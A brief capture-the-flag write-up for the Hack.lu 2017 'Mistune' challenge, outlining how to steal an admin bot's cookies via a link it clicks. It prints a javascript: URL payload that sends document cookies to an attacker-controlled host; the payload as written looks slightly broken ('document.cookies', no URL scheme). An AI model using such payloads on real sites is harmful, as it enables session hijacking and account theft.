Hack.lu CTF 2017 - Mistune

by chq-matteo
October 19, 2017

  1. We can send a message to the admin.
  2. The admin clicks on the links and we have to steal his cookies.

The idea is to use javascript to redirect the admin to a website we control.
We used one of the many free hosting sites

<javascript:document.location='hello.myserver.com/?cookie='+document.cookies>